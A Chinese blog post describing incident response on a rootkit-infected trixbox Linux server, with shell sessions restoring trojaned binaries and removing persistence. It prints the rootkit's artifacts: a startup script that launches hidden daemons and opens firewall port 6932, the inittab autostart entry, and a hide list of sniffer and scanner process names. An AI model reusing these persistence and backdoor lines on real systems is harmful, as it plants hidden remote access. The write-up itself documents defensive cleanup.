周海汉/文 2009.7.27

以前一起创业的同事,突然给我打电话,说运行的一台tribox机器被攻击了。考虑到我linux比较熟,特来求助。

 

我通过远程桌面连接那台linux,发现ssh 2根本连不上。ssh v1还幸好连上了。进去查看ssh配置,无异常,重启sshd发现端口占用。netstat看不到有程序占用sshd的端口。

 

cd操作,root的shell主目录被切换到/usr/lib/libsh

 

但 ls -l /usr/lib >tmp 

grep libsh tmp

为空,说明根本看不见libsh

 

以root权限执行删除,移动,改名均提示无权限。

rm  -rf /usr/lib/libsh

提示没有操作权限。

 

ps -ef 看到有可疑的进程如下:

ls -c < x.x.x.x:yyyy > /dev/null 2>&1

其中x.x.x.x 是IP,用ip138一查,是波兰的一个IP地址。显然这个IP是黑客的跳板。

黑客很可能通过修改过的ls来远程发信息。

 

ls /usr/bin

发现 ls,top,ps,netstat等关键进程都被替换了。其用户不是root,而是112,用户组是114. 这些二进制文件也都不可删改。

 

下面是部分操作:

 

find / -nouser

/etc/shell/stealth
/etc/shell/bash
/etc/shell/randfiles
/etc/shell/randfiles/randnicks.e
/etc/shell/randfiles/randpickup.e
/etc/shell/randfiles/randsignoff.e
/etc/shell/randfiles/randsay.e
/etc/shell/randfiles/randkicks.e
/etc/shell/randfiles/randaway.e
/etc/shell/randfiles/randversions.e
/etc/shell/randfiles/randinsult.e
/etc/shell/cyc.set
/etc/shell/cyc.levels
/etc/shell/cyc.help
/etc/shell/cyc.acc
/etc/shell/cyc.pid
/root/libsh1/hide1
/root/libsh1/.bashrc
/usr/bin/dir
/usr/bin/find
/usr/bin/pstree
/usr/bin/top
/usr/bin/md5sum
/bin/netstat
/bin/ps
/bin/ls
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig

[trixbox1.localdomain .backup]# pwd
/root/libsh1/.backup

[trixbox1.localdomain .backup]# ls -l
total 740
-rwxr-xr-x 1 root root  93560 Jun 27 03:23 dir
-rwxr-xr-x 1 root root 151244 Jun 27 03:23 find
-rwxr-xr-x 1 root root  71528 Jun 27 03:23 ifconfig
-rwxr-xr-x 1 root root  93560 Jun 27 03:23 ls
-rwxr-xr-x 1 root root  27728 Jun 27 03:23 md5sum
-rwxr-xr-x 1 root root 121140 Jun 27 03:23 netstat
-r-xr-xr-x 1 root root  79036 Jun 27 03:23 ps
-rwxr-xr-x 1 root root  18644 Jun 27 03:23 pstree
-r-xr-xr-x 1 root root  58104 Jun 27 03:23 top


[trixbox1.localdomain .backup]# lsattr /bin/ps
s---ia------- /bin/ps

[trixbox1.localdomain .backup]# chattr -iau /bin/ps
[trixbox1.localdomain .backup]# cp ps /bin/.
cp: overwrite `/bin/./ps'? y
[trixbox1.localdomain .backup]# chattr -iau /bin/netstat /bin/ls
[trixbox1.localdomain .backup]# cp netstat /bin/netstat
cp: overwrite `/bin/netstat'? y
[trixbox1.localdomain .backup]# cp ls /bin/ls
cp: overwrite `/bin/ls'? y
[trixbox1.localdomain .backup]# chattr -iau /usr/bin/{top,pstree,dir,md5sum,find}
[trixbox1.localdomain .backup]# cp {top,pstree,dir,md5sum,find} /usr/bin/.
cp: overwrite `/usr/bin/./top'? y
cp: overwrite `/usr/bin/./pstree'? y
cp: overwrite `/usr/bin/./dir'? y
cp: overwrite `/usr/bin/./md5sum'? y
cp: overwrite `/usr/bin/./find'? y

[trixbox1.localdomain .backup]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  
tcp        0      0 0.0.0.0:6600                0.0.0.0:*                   LISTEN      2030/ircd          
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      1979/mysqld        
tcp        0      0 0.0.0.0:5038                0.0.0.0:*                   LISTEN      2306/asterisk      
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1651/portmap       
tcp        0      0 0.0.0.0:1010                0.0.0.0:*                   LISTEN      1676/rpc.statd     
tcp        0      0 0.0.0.0:6932                0.0.0.0:*                   LISTEN      2440/ttyload       
tcp        0      0 10.1.0.13:3306              60.10.140.68:3221           ESTABLISHED 1979/mysqld        
tcp        0      0 :::50021                    :::*                        LISTEN      1838/sshd          
tcp        0      0 :::88                       :::*                        LISTEN      9351/httpd         
tcp        0      0 :::443                      :::*                        LISTEN      9351/httpd         
tcp        0      0 ::ffff:10.1.0.13:50021      ::ffff:10.1.0.68:2967       ESTABLISHED 10403/2            
udp        0      0 0.0.0.0:32768               0.0.0.0:*                               1790/mDNSResponder 
udp        0      0 0.0.0.0:5060                0.0.0.0:*                               2306/asterisk      
udp        0      0 0.0.0.0:69                  0.0.0.0:*                               1854/xinetd        
udp        0      0 0.0.0.0:4569                0.0.0.0:*                               2306/asterisk      
udp        0      0 0.0.0.0:5353                0.0.0.0:*                               1790/mDNSResponder 
udp        0      0 0.0.0.0:1004                0.0.0.0:*                               1676/rpc.statd     
udp        0      0 0.0.0.0:1007                0.0.0.0:*                               1676/rpc.statd     
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               1651/portmap       
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           2447/ttymon
...

[trixbox1.localdomain .backup]# ls -l /lib/libsh.so
total 728
-rwxr-xr-x 1 root root 722684 Jun 27 03:23 bash
-rw-r--r-- 1 root  114    478 Jun 27 03:23 shdcf
-rwx------ 1  122  114    525 Apr 17  2003 shhk
-rwx------ 1  122  114    329 Apr 17  2003 shhk.pub
-rwx------ 1  122  114    512 Jul 21 09:55 shrs
[trixbox1.localdomain .backup]# mv /lib/libsh.so/ /root/libsh.so_bak
mv: cannot move `/lib/libsh.so/' to `/root/libsh.so_bak': Operation not permitted
[trixbox1.localdomain .backup]# chattr -iau /lib/libsh.so/
[trixbox1.localdomain .backup]# mv /lib/libsh.so/ /root/libsh.so_bak

[trixbox1.localdomain .backup]# find / -group 114
/root/libsh1/.sniff/shsniff
/root/libsh1/.sniff/shp
/root/libsh1/hide1
/root/libsh1/shsb
/root/libsh1/.bashrc
/root/libsh.so_bak/shhk.pub
/root/libsh.so_bak/shdcf
/root/libsh.so_bak/shhk
/root/libsh.so_bak/shrs
/usr/bin/dir
/usr/bin/find
/usr/bin/pstree
/usr/bin/top
/usr/bin/md5sum
/bin/netstat
/bin/ps
/bin/ls
find: /proc/25743/task/25743/fd/4: No such file or directory
find: /proc/25743/fd/4: No such file or directory
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig

[trixbox1.localdomain .backup]# chmod 700 /sbin/ifconfig
[trixbox1.localdomain .backup]# chown root:root /sbin/ifconfig
[trixbox1.localdomain .backup]# ll /sbin/ifconfig
-rwx------ 1 root root 71528 Jul 21 23:38 /sbin/ifconfig

[trixbox1.localdomain ~]# vi /etc/inittab

# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload
# Run gettys in standard runlevels

 

[trixbox1.localdomain .backup]# find / -name "*" -exec grep -l "ttyload" {} /;
/etc/inittab
/etc/rc.d/nouser
/etc/prelink.cache
/usr/include/proc.h
/usr/sbin/ttyload


[trixbox1.localdomain ~]# vi /usr/sbin/ttyload

/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
/sbin/ttylib >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 6932 -j ACCEPT
iptables -I INPUT -p tcp --dport 6932 -j ACCEPT

[trixbox1.localdomain ~]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  
tcp        0      0 0.0.0.0:6600                0.0.0.0:*                   LISTEN      2030/ircd          
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      1979/mysqld        
tcp        0      0 0.0.0.0:5038                0.0.0.0:*                   LISTEN      2306/asterisk      
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1651/portmap       
tcp        0      0 0.0.0.0:1010                0.0.0.0:*                   LISTEN      1676/rpc.statd     
tcp        0      0 0.0.0.0:6932                0.0.0.0:*                   LISTEN      2440/ttyload          //attack!!!
tcp        0      0 10.1.0.13:3306              60.10.140.68:3221           ESTABLISHED 1979/mysqld        
tcp        0      0 :::50021                    :::*                        LISTEN      1838/sshd          
tcp        0      0 :::88                       :::*                        LISTEN      9351/httpd         
tcp        0      0 :::443                      :::*                        LISTEN      9351/httpd         
tcp        0      0 ::ffff:10.1.0.13:50021      ::ffff:10.1.0.68:2967       ESTABLISHED 10403/0            
udp        0      0 0.0.0.0:32768               0.0.0.0:*                               1790/mDNSResponder 
udp        0      0 0.0.0.0:5060                0.0.0.0:*                               2306/asterisk      
udp        0      0 0.0.0.0:69                  0.0.0.0:*                               1854/xinetd        
udp        0      0 0.0.0.0:4569                0.0.0.0:*                               2306/asterisk      
udp        0      0 0.0.0.0:5353                0.0.0.0:*                               1790/mDNSResponder 
udp        0      0 0.0.0.0:1004                0.0.0.0:*                               1676/rpc.statd     
udp        0      0 0.0.0.0:1007                0.0.0.0:*                               1676/rpc.statd     
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               1651/portmap       
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           2447/ttymon        


[trixbox1.localdomain .backup]# cat /etc/rc.d/nouser
/etc/shell/stealth
/etc/shell/bash
/etc/shell/randfiles
/etc/shell/randfiles/randnicks.e
/etc/shell/randfiles/randpickup.e
/etc/shell/randfiles/randsignoff.e
/etc/shell/randfiles/randsay.e
/etc/shell/randfiles/randkicks.e
/etc/shell/randfiles/randaway.e
/etc/shell/randfiles/randversions.e
/etc/shell/randfiles/randinsult.e
/etc/shell/cyc.set
/etc/shell/cyc.levels
/etc/shell/cyc.help
/etc/shell/cyc.acc
/etc/shell/cyc.pid
/root/libsh1/hide1
/root/libsh1/.bashrc
/usr/bin/dir
/usr/bin/find
/usr/bin/pstree
/usr/bin/top
/usr/bin/md5sum
/bin/netstat
/bin/ps
/bin/ls
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig

[trixbox1.localdomain .backup]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 ttylib
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload

 

以上是我将/usr/lib/libsh 修改属性后移到/root下面,再一步一步找出rootkit可能感染了哪些文件。可以看出感染的文件很杂。核心文件都指向ttyload。/usr/lib/libsh里面有隐藏目录.backup,应该是正确的原二进制文件的备份,所以一边修改属性,一边恢复ls,top,netstat,ps等关键二进制可执行文件。

最后将所有被感染的文件替换成干净版本或删除,恢复sshd的v2版本连接,crontab里面一分钟清一次log的代码清除,inittab文件里面自动启动ttyload的代码清除。让他们用Nessus和cktoolkit之类的工具扫描一下漏洞。不确定是系统漏洞还是asterisk的漏洞或者是php的http漏洞。把补丁补上,以免再次被攻击。

GitHub 加速计划 / li / linux-dash
10.39 K
1.2 K
下载
A beautiful web dashboard for Linux
最近提交(Master分支:2 个月前 )
186a802e added ecosystem file for PM2 4 年前
5def40a3 Add host customization support for the NodeJS version 4 年前
Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐